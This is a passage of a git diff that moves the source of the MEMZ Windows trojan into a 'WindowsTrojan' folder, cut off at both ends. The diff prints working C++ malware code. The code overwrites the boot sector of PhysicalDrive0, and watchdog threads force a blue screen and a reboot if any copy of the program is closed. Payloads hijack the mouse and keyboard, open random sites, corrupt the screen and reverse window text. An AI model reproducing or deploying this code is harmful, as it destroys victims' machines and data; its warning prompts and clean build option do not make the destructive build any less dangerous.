0x8000) { - enablePayloads = !enablePayloads; - - if (!enablePayloads) { - RECT rect; - HWND desktop = GetDesktopWindow(); - GetWindowRect(desktop, &rect); - - RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN); - - EnumWindows(&CleanWindowsProc, NULL); - } else { - RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE); - } - - while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) { - Sleep(100); - } - } else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState('S')) & 0x8000) { - if (enablePayloads) { - for (int p = 0; p < nPayloads; p++) { - if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { - payloads[p].delay = ((PAYLOADFUNCTIONDEFAULT((*)))payloads[p].payloadFunction)(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE); - } - } - } - } - - Sleep(10); - } - - return 0; -} - -BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam) { - DWORD pid; - if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) { - SendMessage(hwnd, WM_CLOSE, 0, 0); - } - return TRUE; -} -#endif - - +#include "memz.h" + +#ifdef CLEAN +HWND mainWindow; // In the main window, in the main window, in the main window, ... +HFONT font; +HWND dialog; +#endif + +void main() { +#ifndef CLEAN + int argc; + LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc); + + if (argc > 1) { + if (!lstrcmpW(argv[1], L"/watchdog")) { + CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL); + + WNDCLASSEXA c; + c.cbSize = sizeof(WNDCLASSEXA); + c.lpfnWndProc = WindowProc; + c.lpszClassName = "hax"; + c.style = 0; + c.cbClsExtra = 0; + c.cbWndExtra = 0; + c.hInstance = NULL; + c.hIcon = 0; + c.hCursor = 0; + c.hbrBackground = 0; + c.lpszMenuName = NULL; + c.hIconSm = 0; + + RegisterClassExA(&c); + + HWND hwnd = CreateWindowExA(0, "hax", NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL); + + MSG msg; + while (GetMessage(&msg, NULL, 0, 0) > 0) { + TranslateMessage(&msg); + DispatchMessage(&msg); + } + } + } else { + // Another very ugly formatting + if (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\ +This malware will harm your computer and makes it unusable.\r\n\ +If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\ +If you know what this malware does and are using a safe environment to test, \ +press Yes to start it.\r\n\r\n\ +DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES || +MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\ +THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n\ +STILL EXECUTE IT?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) { + ExitProcess(0); + } + + wchar_t *fn = (wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2); + GetModuleFileName(NULL, fn, 8192); + + for (int i = 0; i < 5; i++) + ShellExecute(NULL, NULL, fn, L"/watchdog", NULL, SW_SHOWDEFAULT); + + SHELLEXECUTEINFO info; + info.cbSize = sizeof(SHELLEXECUTEINFO); + info.lpFile = fn; + info.lpParameters = L"/main"; + info.fMask = SEE_MASK_NOCLOSEPROCESS; + info.hwnd = NULL; + info.lpVerb = NULL; + info.lpDirectory = NULL; + info.hInstApp = NULL; + info.nShow = SW_SHOWDEFAULT; + + ShellExecuteEx(&info); + + SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS); + + ExitProcess(0); + } + + HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); + + if (drive == INVALID_HANDLE_VALUE) + ExitProcess(2); + + unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536); + + // Join the two code parts together + int i = 0; + for (; i < code1_len; i++) + *(bootcode + i) = *(code1 + i); + for (i = 0; i < code2_len; i++) + *(bootcode + i + 0x1fe) = *(code2 + i); + + DWORD wb; + if (!WriteFile(drive, bootcode, 65536, &wb, NULL)) + ExitProcess(3); + + CloseHandle(drive); + + HANDLE note = CreateFileA("\\note.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); + + if (note == INVALID_HANDLE_VALUE) + ExitProcess(4); + + if (!WriteFile(note, msg, msg_len, &wb, NULL)) + ExitProcess(5); + + CloseHandle(note); + ShellExecuteA(NULL, NULL, "notepad", "\\note.txt", NULL, SW_SHOWDEFAULT); + + for (int p = 0; p < nPayloads; p++) { + Sleep(payloads[p].startDelay); + CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL); + } + + for (;;) { + Sleep(10000); + } + +#else // CLEAN + InitCommonControls(); + + dialog = NULL; + + LOGFONT lf; + GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof(LOGFONT), &lf); + font = CreateFont(lf.lfHeight, lf.lfWidth, + lf.lfEscapement, lf.lfOrientation, lf.lfWeight, + lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet, + lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality, + lf.lfPitchAndFamily, lf.lfFaceName); + + WNDCLASSEX c; + c.cbSize = sizeof(WNDCLASSEX); + c.lpfnWndProc = WindowProc; + c.lpszClassName = L"MEMZPanel"; + c.style = CS_HREDRAW | CS_VREDRAW; + c.cbClsExtra = 0; + c.cbWndExtra = 0; + c.hInstance = NULL; + c.hIcon = 0; + c.hCursor = 0; + c.hbrBackground = (HBRUSH)(COLOR_3DFACE+1); + c.lpszMenuName = NULL; + c.hIconSm = 0; + + RegisterClassEx(&c); + + RECT rect; + rect.left = 0; + rect.right = WINDOWWIDTH; + rect.top = 0; + rect.bottom = WINDOWHEIGHT; + + AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE); + + mainWindow = CreateWindowEx(0, L"MEMZPanel", L"MEMZ Clean Version - Payload Panel", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, + 50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL); + + for (int p = 0; p < nPayloads; p++) { + payloads[p].btn = CreateWindowW(L"BUTTON", payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY, + (p%COLUMNS)*BTNWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*BTNHEIGHT + SPACE*(p/COLUMNS+1), BTNWIDTH, BTNHEIGHT, + mainWindow, NULL, (HINSTANCE)GetWindowLong(mainWindow, GWL_HINSTANCE), NULL); + SendMessage(payloads[p].btn, WM_SETFONT, (WPARAM)font, TRUE); + + CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL); + //CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL); + } + + SendMessage(mainWindow, WM_SETFONT, (WPARAM)font, TRUE); + + ShowWindow(mainWindow, SW_SHOW); + UpdateWindow(mainWindow); + + CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL); + + MSG msg; + while (GetMessage(&msg, NULL, 0, 0) > 0) { + if (dialog == NULL || !IsDialogMessage(dialog, &msg)) { + TranslateMessage(&msg); + DispatchMessage(&msg); + } + } +#endif +} + +#ifndef CLEAN +LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { + if (msg == WM_CLOSE || msg == WM_ENDSESSION) { + killWindows(); + return 0; + } + + return DefWindowProc(hwnd, msg, wParam, lParam); +} + +DWORD WINAPI watchdogThread(LPVOID parameter) { + int oproc = 0; + + char *fn = (char *)LocalAlloc(LMEM_ZEROINIT, 512); + GetProcessImageFileNameA(GetCurrentProcess(), fn, 512); + + Sleep(1000); + + for (;;) { + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); + PROCESSENTRY32 proc; + proc.dwSize = sizeof(proc); + + Process32First(snapshot, &proc); + + int nproc = 0; + do { + HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID); + char *fn2 = (char *)LocalAlloc(LMEM_ZEROINIT, 512); + GetProcessImageFileNameA(hProc, fn2, 512); + + if (!lstrcmpA(fn, fn2)) { + nproc++; + } + + CloseHandle(hProc); + LocalFree(fn2); + } while (Process32Next(snapshot, &proc)); + + CloseHandle(snapshot); + + if (nproc < oproc) { + killWindows(); + } + + oproc = nproc; + + Sleep(10); + } +} + +void killWindows() { + // Show cool MessageBoxes + for (int i = 0; i < 20; i++) { + CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL); + Sleep(100); + } + + killWindowsInstant(); +} + +void killWindowsInstant() { + // Try to force BSOD first + // I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)... + // This isn't even an exploit, it's just an undocumented feature. + HMODULE ntdll = LoadLibraryA("ntdll"); + FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege"); + FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError"); + + if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) { + BOOLEAN tmp1; DWORD tmp2; + ((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)(19, 1, 0, &tmp1); + ((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2); + } + + // If the computer is still running, do it the normal way + HANDLE token; + TOKEN_PRIVILEGES privileges; + + OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token); + + LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid); + privileges.PrivilegeCount = 1; + privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + + AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0); + + // The actual restart + ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK); +} + +DWORD WINAPI ripMessageThread(LPVOID parameter) { + HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId()); + MessageBoxA(NULL, (LPCSTR)msgs[random() % nMsgs], "MEMZ", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND); + UnhookWindowsHookEx(hook); + + return 0; +} +#else // CLEAN +LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { + PAINTSTRUCT ps; + HDC hdc; + + if (msg == WM_ACTIVATE) { + if (wParam == NULL) + dialog = NULL; + else + dialog = hwnd; + } else if (msg == WM_DESTROY) { + ExitProcess(0); + } else if (msg == WM_COMMAND) { + if (wParam == BN_CLICKED && SendMessage((HWND)lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) { + for (int p = 0; p < nPayloads; p++) { + if (payloads[p].btn == (HWND)lParam && !payloads[p].safe) { + SendMessage((HWND)lParam, BM_SETCHECK, BST_UNCHECKED, NULL); + // Most ugly formatting EVER + if (MessageBoxA(hwnd, + "This payload is considered semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\ +If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \ +virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\ +Do you still want to enable it?", +"MEMZ", MB_YESNO | MB_ICONWARNING) == IDYES) { + SendMessage((HWND)lParam, BM_SETCHECK, BST_CHECKED, NULL); + } + } + } + } + } else if (msg == WM_PAINT) { + hdc = BeginPaint(hwnd, &ps); + SelectObject(hdc, font); + LPWSTR str; + LPWSTR state = enablePayloads ? L"ENABLED" : L"DISABLED"; + FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY, + L"Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!", 0, 0, (LPWSTR)&str, 1024, (va_list*)&state); + + TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str)); + TextOut(hdc, 10, WINDOWHEIGHT - 20, L"Press CTRL+SHIFT+S to skip some time (makes some payloads faster)", 65); + + EndPaint(hwnd, &ps); + } else { + return DefWindowProc(hwnd, msg, wParam, lParam); + } + + return 0; +} + +DWORD WINAPI keyboardThread(LPVOID lParam) { + for (;;) { + if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) { + enablePayloads = !enablePayloads; + + if (!enablePayloads) { + RECT rect; + HWND desktop = GetDesktopWindow(); + GetWindowRect(desktop, &rect); + + RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN); + + EnumWindows(&CleanWindowsProc, NULL); + } else { + RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE); + } + + while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) { + Sleep(100); + } + } else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState('S')) & 0x8000) { + if (enablePayloads) { + for (int p = 0; p < nPayloads; p++) { + if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { + payloads[p].delay = ((PAYLOADFUNCTIONDEFAULT((*)))payloads[p].payloadFunction)(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE); + } + } + } + } + + Sleep(10); + } + + return 0; +} + +BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam) { + DWORD pid; + if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) { + SendMessage(hwnd, WM_CLOSE, 0, 0); + } + return TRUE; +} +#endif + + diff --git a/VCProject/MEMZ/memz.h b/WindowsTrojan/MEMZ/memz.h similarity index 96% rename from VCProject/MEMZ/memz.h rename to WindowsTrojan/MEMZ/memz.h index bf730ad..8a835f7 100644 --- a/VCProject/MEMZ/memz.h +++ b/WindowsTrojan/MEMZ/memz.h @@ -1,65 +1,65 @@ -// If this is defined, the trojan will disable all destructive payloads -// and does display a GUI to manually control all of the non-destructive ones. -//#define CLEAN - -#ifdef CLEAN -// Enable XP styles -#pragma comment(linker,"\"/manifestdependency:type='win32' \ -name='Microsoft.Windows.Common-Controls' version='6.0.0.0' \ -processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"") - -// Window attributes -#define BTNWIDTH 200 -#define BTNHEIGHT 30 -#define COLUMNS 3 -#define ROWS ((nPayloads + nPayloads%COLUMNS)/COLUMNS) -#define SPACE 10 -#define WINDOWWIDTH COLUMNS * BTNWIDTH + (COLUMNS + 1)*SPACE -#define WINDOWHEIGHT ROWS * BTNHEIGHT + (ROWS + 1)*SPACE + 32 -#endif - -#pragma once - -#include -#include -#include -#include -#include - -#include "data.h" -#include "payloads.h" - -int random(); -void strReverseW(LPWSTR str); - -PAYLOADHOST(payloadHostDefault); -PAYLOADHOST(payloadHostVisual); - -LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam); - -#ifndef CLEAN -void killWindows(); -void killWindowsInstant(); - -DWORD WINAPI ripMessageThread(LPVOID); -DWORD WINAPI watchdogThread(LPVOID); -#else -DWORD WINAPI keyboardThread(LPVOID lParam); -extern BOOLEAN enablePayloads; -BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam); -#endif - -PAYLOADFUNCTIONDEFAULT(payloadExecute); -PAYLOADFUNCTIONDEFAULT(payloadCursor); -PAYLOADFUNCTIONVISUAL(payloadInvert); -PAYLOADFUNCTIONDEFAULT(payloadMessageBox); -DWORD WINAPI messageBoxThread(LPVOID); -LRESULT CALLBACK msgBoxHook(int, WPARAM, LPARAM); -PAYLOADFUNCTIONDEFAULT(payloadReverseText); -BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam); -PAYLOADFUNCTIONDEFAULT(payloadSound); -PAYLOADFUNCTIONVISUAL(payloadGlitches); -PAYLOADFUNCTIONDEFAULT(payloadKeyboard); -PAYLOADFUNCTIONVISUAL(payloadTunnel); -PAYLOADFUNCTIONVISUAL(payloadDrawErrors); +// If this is defined, the trojan will disable all destructive payloads +// and does display a GUI to manually control all of the non-destructive ones. +//#define CLEAN + +#ifdef CLEAN +// Enable XP styles +#pragma comment(linker,"\"/manifestdependency:type='win32' \ +name='Microsoft.Windows.Common-Controls' version='6.0.0.0' \ +processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"") + +// Window attributes +#define BTNWIDTH 200 +#define BTNHEIGHT 30 +#define COLUMNS 3 +#define ROWS ((nPayloads + nPayloads%COLUMNS)/COLUMNS) +#define SPACE 10 +#define WINDOWWIDTH COLUMNS * BTNWIDTH + (COLUMNS + 1)*SPACE +#define WINDOWHEIGHT ROWS * BTNHEIGHT + (ROWS + 1)*SPACE + 32 +#endif + +#pragma once + +#include +#include +#include +#include +#include + +#include "data.h" +#include "payloads.h" + +int random(); +void strReverseW(LPWSTR str); + +PAYLOADHOST(payloadHostDefault); +PAYLOADHOST(payloadHostVisual); + +LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam); + +#ifndef CLEAN +void killWindows(); +void killWindowsInstant(); + +DWORD WINAPI ripMessageThread(LPVOID); +DWORD WINAPI watchdogThread(LPVOID); +#else +DWORD WINAPI keyboardThread(LPVOID lParam); +extern BOOLEAN enablePayloads; +BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam); +#endif + +PAYLOADFUNCTIONDEFAULT(payloadExecute); +PAYLOADFUNCTIONDEFAULT(payloadCursor); +PAYLOADFUNCTIONVISUAL(payloadInvert); +PAYLOADFUNCTIONDEFAULT(payloadMessageBox); +DWORD WINAPI messageBoxThread(LPVOID); +LRESULT CALLBACK msgBoxHook(int, WPARAM, LPARAM); +PAYLOADFUNCTIONDEFAULT(payloadReverseText); +BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam); +PAYLOADFUNCTIONDEFAULT(payloadSound); +PAYLOADFUNCTIONVISUAL(payloadGlitches); +PAYLOADFUNCTIONDEFAULT(payloadKeyboard); +PAYLOADFUNCTIONVISUAL(payloadTunnel); +PAYLOADFUNCTIONVISUAL(payloadDrawErrors); PAYLOADHOST(payloadHostCrazyBus); \ No newline at end of file diff --git a/VCProject/MEMZ/payloads.cpp b/WindowsTrojan/MEMZ/payloads.cpp similarity index 96% rename from VCProject/MEMZ/payloads.cpp rename to WindowsTrojan/MEMZ/payloads.cpp index fd3ae9f..f1d8368 100644 --- a/VCProject/MEMZ/payloads.cpp +++ b/WindowsTrojan/MEMZ/payloads.cpp @@ -1,300 +1,300 @@ -#include "memz.h" - -PAYLOAD payloads[] = { -#ifdef CLEAN - { payloadHostDefault, (LPVOID)payloadExecute, L"Open random websites/programs", FALSE, 0, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadCursor, L"Random cursor movement", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadKeyboard, L"Random keyboard input", FALSE, 0, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadSound, L"Random error sounds", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadInvert, L"Invert Screen", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadMessageBox, L"Message boxes", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadDrawErrors, L"Draw error icons", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadReverseText, L"Reverse text", FALSE, 0, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadTunnel, L"Tunnel effect", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadGlitches, L"Screen glitches", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostCrazyBus, NULL, L"Crazy Bus (Ear Rape)", TRUE, 0, 0, 0, 0, 0 }, -#else - { payloadHostDefault, (LPVOID)payloadExecute, 30000, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadCursor, 30000, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadKeyboard, 20000, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadSound, 50000, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadInvert, 30000, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadMessageBox, 20000, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadDrawErrors, 10000, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadReverseText, 40000, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadTunnel, 60000, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadGlitches, 15000, 0, 0, 0, 0 }, - { payloadHostCrazyBus, NULL, 1000, 0, 0, 0, 0 }, -#endif -}; - -const size_t nPayloads = sizeof(payloads) / sizeof(PAYLOAD); -BOOLEAN enablePayloads = TRUE; - -PAYLOADHOST(payloadHostDefault) { - PAYLOAD *payload = (PAYLOAD*)parameter; - - for (;;) { -#ifdef CLEAN - if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { -#endif - if (payload->delaytime++ >= payload->delay) { -#ifdef CLEAN - payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE); -#else - payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime); -#endif - - payload->delaytime = 0; - } - - payload->runtime++; -#ifdef CLEAN - } else { - payload->runtime = 0; - payload->times = 0; - payload->delay = 0; - } -#endif - - Sleep(10); - } -} - -PAYLOADHOST(payloadHostVisual) { - PAYLOAD *payload = (PAYLOAD*)parameter; - - HWND hwnd = GetDesktopWindow(); - HDC hdc = GetWindowDC(hwnd); - RECT rekt; - GetWindowRect(hwnd, &rekt); - int w = rekt.right - rekt.left; - int h = rekt.bottom - rekt.top; - - for (;;) { -#ifdef CLEAN - if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { -#endif - if (payload->delaytime++ >= payload->delay) { -#ifdef CLEAN - payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE, hwnd, hdc, &rekt, w, h); -#else - payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, hwnd, hdc, &rekt, w, h); -#endif - payload->delaytime = 0; - } - - payload->runtime++; -#ifdef CLEAN - } - else { - payload->runtime = 0; - payload->times = 0; - payload->delay = 0; - } -#endif - - Sleep(10); - } -} - -PAYLOADFUNCTIONDEFAULT(payloadExecute) { - PAYLOADHEAD - - ShellExecuteA(NULL, "open", (LPCSTR)sites[random() % nSites], NULL, NULL, SW_SHOWDEFAULT); - - out: return 1500.0 / (times / 15.0 + 1) + 100 + (random() % 200); -} - -PAYLOADFUNCTIONVISUAL(payloadInvert) { - PAYLOADHEAD - - BitBlt(hdc, 0, 0, w, h, hdc, 0, 0, NOTSRCCOPY); - - out: return 100; -} - -PAYLOADFUNCTIONDEFAULT(payloadCursor) { - PAYLOADHEAD - - POINT cursor; - GetCursorPos(&cursor); - - SetCursorPos(cursor.x + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)), cursor.y + (random() % 3 - 1) * (random() % (runtime / 2200 + 2))); - - out: return 2; -} - -PAYLOADFUNCTIONDEFAULT(payloadMessageBox) { - PAYLOADHEAD - - CreateThread(NULL, 4096, &messageBoxThread, NULL, NULL, NULL); - - out: return 2000.0 / (times / 8.0 + 1) + 20 + (random() % 30); -} - -DWORD WINAPI messageBoxThread(LPVOID parameter) { - HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId()); - MessageBoxW(NULL, L"Still using this computer?", L"lol", MB_SYSTEMMODAL | MB_OK | MB_ICONWARNING); - UnhookWindowsHookEx(hook); - - return 0; -} - -LRESULT CALLBACK msgBoxHook(int nCode, WPARAM wParam, LPARAM lParam) { - if (nCode == HCBT_CREATEWND) { - CREATESTRUCT *pcs = ((CBT_CREATEWND *)lParam)->lpcs; - - if ((pcs->style & WS_DLGFRAME) || (pcs->style & WS_POPUP)) { - HWND hwnd = (HWND)wParam; - - int x = random() % (GetSystemMetrics(SM_CXSCREEN) - pcs->cx); - int y = random() % (GetSystemMetrics(SM_CYSCREEN) - pcs->cy); - - pcs->x = x; - pcs->y = y; - } - } - - return CallNextHookEx(0, nCode, wParam, lParam); -} - -PAYLOADFUNCTIONDEFAULT(payloadReverseText) { - PAYLOADHEAD - - EnumChildWindows(GetDesktopWindow(), &EnumChildProc, NULL); - - out: return 50; -} - -BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam) { - LPWSTR str = (LPWSTR)GlobalAlloc(GMEM_ZEROINIT, sizeof(WCHAR) * 8192); - - if (SendMessageTimeoutW(hwnd, WM_GETTEXT, 8192, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL)) { - strReverseW(str); - SendMessageTimeoutW(hwnd, WM_SETTEXT, NULL, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL); - } - - GlobalFree(str); - - return TRUE; -} - -PAYLOADFUNCTIONDEFAULT(payloadSound) { - PAYLOADHEAD - - // There seems to be a bug where toggling ALL payloads kills the sound output on some systems. - // I don't know why this happens, but using SND_SYNC seems to fix the bug. - // But the sound is not not as fast as before. I hope there is another way to fix it without slowing down the payload. - // As this only happens for the enable-disable part, I will only include that in the clean build as a workaround. -#ifdef CLEAN - PlaySoundA(sounds[random() % nSounds], GetModuleHandle(NULL), SND_SYNC); - out: return random() % 10; -#else - PlaySoundA(sounds[random() % nSounds], GetModuleHandle(NULL), SND_ASYNC); - out: return 20 + (random() % 20); -#endif -} - -PAYLOADFUNCTIONVISUAL(payloadGlitches) { - PAYLOADHEAD - - int x1 = random() % (w - 400); - int y1 = random() % (h - 400); - int x2 = random() % (w - 400); - int y2 = random() % (h - 400); - int width = random() % 400; - int height = random() % 400; - - BitBlt(hdc, x1, y1, width, height, hdc, x2, y2, SRCCOPY); - - out: return 200.0 / (times / 5.0 + 1) + 3; -} - -PAYLOADFUNCTIONDEFAULT(payloadKeyboard) { - PAYLOADHEAD - - INPUT input; - - input.type = INPUT_KEYBOARD; - input.ki.wVk = (random() % (0x5a - 0x30)) + 0x30; - SendInput(1, &input, sizeof(INPUT)); - - out: return 300 + (random() % 400); -} - -PAYLOADFUNCTIONVISUAL(payloadTunnel) { - PAYLOADHEAD - - StretchBlt(hdc, 50, 50, w - 100, h - 100, hdc, 0, 0, w, h, SRCCOPY); - - out: return 200.0 / (times / 5.0 + 1) + 4; -} - -PAYLOADFUNCTIONVISUAL(payloadDrawErrors) { - PAYLOADHEAD - - int ix = GetSystemMetrics(SM_CXICON) / 2; - int iy = GetSystemMetrics(SM_CYICON) / 2; - - POINT cursor; - GetCursorPos(&cursor); - - DrawIcon(hdc, cursor.x - ix, cursor.y - iy, LoadIcon(NULL, IDI_ERROR)); - - if (random() % (int)(10/(times/500.0+1)+1) == 0) { - DrawIcon(hdc, random()%(w-ix), random()%(h-iy), LoadIcon(NULL, IDI_WARNING)); - } - - out: return 2; -} - -PAYLOADHOST(payloadHostCrazyBus) { - PAYLOAD *payload = (PAYLOAD*)parameter; - - WAVEFORMATEX fmt = { WAVE_FORMAT_PCM, 1, 44100, 44100, 1, 8, 0 }; - - HWAVEOUT hwo; - waveOutOpen(&hwo, WAVE_MAPPER, &fmt, NULL, NULL, CALLBACK_NULL); - - const int bufsize = 44100 * 30; // 30 Seconds - char *wavedata = (char *)LocalAlloc(0, bufsize); - - WAVEHDR hdr = { wavedata, bufsize, 0, 0, 0, 0, 0, 0 }; - waveOutPrepareHeader(hwo, &hdr, sizeof(hdr)); - - for (;;) { -#ifdef CLEAN - if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { -#endif - int freq = 0; - for (int i = 0; i < bufsize; i++) { - if (i % (44100 / 4) == 0) - freq = 44100 / ((random() % 4000) + 1000); - - wavedata[i] = (char)(((i % freq) / ((float)freq)) * 100); - } - -#ifdef CLEAN - waveOutReset(hwo); -#endif - waveOutWrite(hwo, &hdr, sizeof(hdr)); - - while (!(hdr.dwFlags & WHDR_DONE) -#ifdef CLEAN - && (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) -#endif - ) { - Sleep(1); - } - -#ifdef CLEAN - if (!enablePayloads || SendMessage(payload->btn, BM_GETCHECK, 0, NULL) != BST_CHECKED) { - waveOutPause(hwo); - } - } else { - Sleep(10); - } -#endif - } +#include "memz.h" + +PAYLOAD payloads[] = { +#ifdef CLEAN + { payloadHostDefault, 